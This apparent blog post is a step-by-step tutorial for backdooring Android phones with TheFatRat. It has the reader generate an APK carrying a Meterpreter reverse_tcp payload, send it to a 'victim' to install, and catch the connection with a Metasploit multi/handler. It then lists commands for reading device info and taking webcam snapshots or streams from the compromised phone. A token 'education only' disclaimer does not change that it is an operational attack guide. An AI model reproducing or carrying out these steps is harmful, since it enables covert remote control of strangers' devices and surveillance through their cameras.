Hack Any Android Device With FatRat Tool.(Tutorial) (Kali linux)(Parrot Security OS) - Android, windows and Linux based tips tutorial.

Breaking

Search Bar

test banner

Post Top Ad

Responsive Ads Here

Post Top Ad

Responsive Ads Here

Saturday, April 1, 2017

Hack Any Android Device With FatRat Tool.(Tutorial) (Kali linux)(Parrot Security OS)

Hello, Guys Today I will Show You How To Hack Any Android Device With FatRat Tool. 

LOGO


* Warning *
1. It's for Education Purpose Only.
2. All Attacks Done With My Own device
3. Don't Use In Illegal Works.


*Requirements*

1. Kali Linux Installed Pc (You Can Run Also Live Mode)

2. Some Knowledge About Kali Linux (Not Higher Requirement Follow My Steps Only) 
3. Android-based Any Device.
4. Some Patience.




* Process*
1. Open Your Terminal And Type git clone https://github.com/Screetsec/TheFatRat.git


2. Wait For 15 Minutes (It's Based On Your Internet Connection).

Click Here For More Technical Stuff

3. Now Type cd FatRat Hit Enter, Then Type chmod +x install.sh And hit Enter.
4. Now For Run Setup Type ./install.sh And Hit Enter.
5. Wait For 30 Minutes For Installing Files.
6.If In Installing You Got Mingw Error Then Type Other Terminal And Type apt-get install mingw-w64 hit enter
7. Now Type fatrat for run FATRAT.
8. Now FATRAT Is Checking All Required File.
9.When Checked Hit Enter 2 Times.




Warning Logo.
10. Now You See Main Fatrat Page And Lots Of Options For Making Payload.



11. Now Type 1 Hit enter, Then Type 3. 
12. Now Enter Ip Address. ( Open New Terminal And Type Ifconfig And Copy Your Ip My Is 192.168.0.107) And Hit Enter. (For Global You Can Use Port Forwarding ) 
13. Now Enter Lport 4444 Hit Enter 
14. Now Give A Name Your File And Hit Enter Wait For 1 Minute.
15. Now Press n Hit Enter
16. Your Apk File Is Saved In TheFatRat/output Folder.
17. Send To Your Victim's Device And Install It.
18. Now Press 14 Then 9 Hit Enter.
19. Now It's Open Msfconsole.

MSFCONSOLE
20. Now Type use multi/handler Hit Enter
21.Then Type set PAYLOAD android/meterpreter/reverse_tcp Hit Enter.
22.Then Type set LHOST YourIP Hit Enter.
23.Then Type set LPORT 4444 (Default Port)
24.Now Type exploit And Hit Enter. Now You Are Connected With Victim's Cellphone.


25. Now Type Sysinfo You Can See Victim's Device Info Here.
26. For More Commands Type help.

*webcam_list*
*webcam_snap1*
*webcam_snap2*
*webcam_stream*  (REMOVE * )


27. You Can Read Our Previous Hacking Android Blog From Here
28. You Can Use Lot's Of Function In Fatrat So I Made Post On It.


Thanks For Reading Come Again And Encourage Us.

2 comments:

Post Top Ad

Responsive Ads Here